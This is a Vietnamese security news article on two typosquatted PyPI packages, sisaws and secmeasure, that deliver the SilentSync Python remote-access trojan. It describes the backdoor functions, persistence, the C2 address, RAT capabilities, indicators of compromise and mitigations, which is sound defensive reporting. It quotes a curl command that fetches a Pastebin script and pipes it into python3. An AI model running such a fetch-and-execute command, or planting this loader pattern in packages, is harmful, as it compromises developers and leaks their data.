Ngày 4 tháng 8 năm 2025, Zscaler ThreatLabz đã phát hiện hai gói Python độc hại có tên sisaws và secmeasure. Các gói này được thiết kế để phát tán mã độc SilentSync, một loại trojan truy cập từ xa (RAT) dựa trên Python, nhắm mục tiêu vào các nhà phát triển không nghi ngờ.

Cả hai gói đều khai thác kỹ thuật typosquatting để mạo danh các thư viện hợp pháp trên Python Package Index (PyPI), tạo ra rủi ro nghiêm trọng cho chuỗi cung ứng phần mềm đối với các dự án cài đặt chúng.

Phân tích Mã độc SilentSync và Kỹ thuật Typosquatting

Mã độc SilentSync sở hữu nhiều khả năng linh hoạt, bao gồm thực thi lệnh từ xa, đánh cắp tệp, chụp màn hình và trộm dữ liệu trình duyệt web. Hiện tại, mã độc này nhắm vào các hệ thống Windows, nhưng chứa các module duy trì quyền truy cập tích hợp cho cả Linux và macOS.

Phân tích chi tiết gói sisaws

Phân tích sâu của ThreatLabz cho thấy gói sisaws giả mạo trình bao bọc API SISA của Argentina, bắt chước các module như puco và renaper. Mục đích là để xác thực DNI (Chứng minh thư quốc gia Argentina) và truy xuất các phản hồi chăm sóc sức khỏe có cấu trúc.

Tuy nhiên, script khởi tạo của nó (init.py) ẩn chứa một hàm backdoor có tên gen_token, được bảo vệ bởi một token mã hóa cứng. Khi được gọi đúng cách, gen_token sẽ tạo ra một phản hồi giống API và cấp một token tĩnh thứ cấp để mở khóa quá trình triển khai mã độc SilentSync.

Về cơ bản, hàm gen_token giải mã một chuỗi được mã hóa hex để lộ một lệnh curl. Lệnh này được dùng để tải xuống helper.py từ Pastebin và thực thi nó.

curl -sS https://pastebin.com/raw/xxxxxxxx | python3

Script helper.py chính là mã độc SilentSync. Nó bắt đầu quá trình duy trì quyền truy cập trên Windows bằng cách tạo một khóa Run dưới đường dẫn HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunPyHelper.

Phân tích chi tiết gói secmeasure

Gói secmeasure, được quảng cáo là một thư viện làm sạch chuỗi (string-sanitization), chia sẻ cùng thông tin tác giả và backdoor khởi tạo như gói sisaws.

Hàm sanitize_input của nó triển khai cùng payload curl được mã hóa hex. Các hàm hợp pháp như strip_whitespace, remove_special_chars và normalize_unicode chỉ tồn tại như những mồi nhử. Gói này thậm chí còn đưa ra ngoại lệ NameError cho các import bị thiếu để gây khó khăn cho việc kiểm tra sơ bộ.

ThreatLabz đã theo dõi bốn phiên bản phát hành của các gói độc hại này từ ngày 3 đến 4 tháng 8 năm 2025: secmeasure phiên bản 0.1.0, 0.1.1, 0.1.2 và sisaws phiên bản 2.1.6. Điều này cho thấy sự lặp lại nhanh chóng của các tác nhân đe dọa.

Hoạt động của Mã độc SilentSync RAT

Mã độc SilentSync giải mã địa chỉ IP máy chủ C2 (Command and Control) được mã hóa cứng là 200.58.107[.]25 từ Base64 tại thời điểm chạy. Mã độc này giao tiếp qua HTTP trên cổng TCP 5000. Nó triển khai các điểm cuối (REST endpoints) cho các hoạt động theo từng bước.

Các lệnh được hỗ trợ bao gồm:

• remote_exec: Thực thi lệnh từ xa trên hệ thống nạn nhân.
• file_exfil: Đánh cắp và chuyển dữ liệu ra ngoài hệ thống. Đây là một hình thức rò rỉ dữ liệu nhạy cảm nguy hiểm.
• screen_capture: Chụp ảnh màn hình hoạt động của người dùng.
• browser_data_theft: Trích xuất thông tin từ trình duyệt.

Chức năng đánh cắp dữ liệu trình duyệt được triển khai cho các trình duyệt thuộc họ Chromium và Firefox trên Windows. Sau khi đánh cắp dữ liệu, mã độc SilentSync sẽ xóa an toàn các hiện vật cục bộ để tránh bị phát hiện.

Một trong những lỗ hổng tương tự từng được phát hiện trên Firefox là lỗi thực thi mã nghiêm trọng. Thông tin chi tiết có thể được tìm thấy tại Firefox 140 Launches With Critical Code Execution Bug.

Chỉ số Nhận diện Tấn công (IOCs)

Các chỉ số nhận diện tấn công sau đây có thể giúp phát hiện và ngăn chặn các cuộc tấn công liên quan đến mã độc SilentSync:

• Tên gói độc hại:sisaws, secmeasure
• Địa chỉ C2:200.58.107[.]25
• Tên tệp độc hại:helper.py
• Khóa Registry tạo bởi mã độc:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunPyHelper

Biện pháp Phòng ngừa và Giảm thiểu Rủi ro đối với Tấn công Chuỗi Cung ứng

Việc phát hiện các gói sisaws và secmeasure nhấn mạnh mối đe dọa ngày càng tăng của typosquatting trong các kho lưu trữ công khai. Bằng cách mạo danh các thư viện hợp pháp và nhúng backdoor để triển khai mã độc SilentSync RAT, các tác nhân đe dọa có thể xâm nhập môi trường phát triển và thu thập rò rỉ dữ liệu nhạy cảm mà không bị phát hiện. Để chống lại các cuộc tấn công chuỗi cung ứng này, các nhà phát triển và đội ngũ bảo mật phải áp dụng các biện pháp xác thực gói nghiêm ngặt hơn.

Các Biện pháp Khuyến nghị

• Xác minh checksum: Luôn kiểm tra mã băm (hash) của các gói được tải xuống so với các giá trị được công bố chính thức.
• Lọc dựa trên uy tín: Sử dụng các công cụ và dịch vụ phân tích uy tín để đánh giá độ tin cậy của các thư viện bên thứ ba.
• Kiểm tra trong môi trường sandbox: Cô lập và kiểm tra các phụ thuộc mới trong môi trường sandbox trước khi tích hợp vào dự án chính.
• Giám sát chủ động: Duy trì cảnh giác và giám sát liên tục các hoạt động mạng để phát hiện sớm các dấu hiệu xâm nhập hoặc hành vi bất thường.

Sự cảnh giác và giám sát chủ động là yếu tố then chốt để bảo vệ chuỗi cung ứng phần mềm chống lại các phần mềm độc hại được cấy ghép một cách thầm lặng.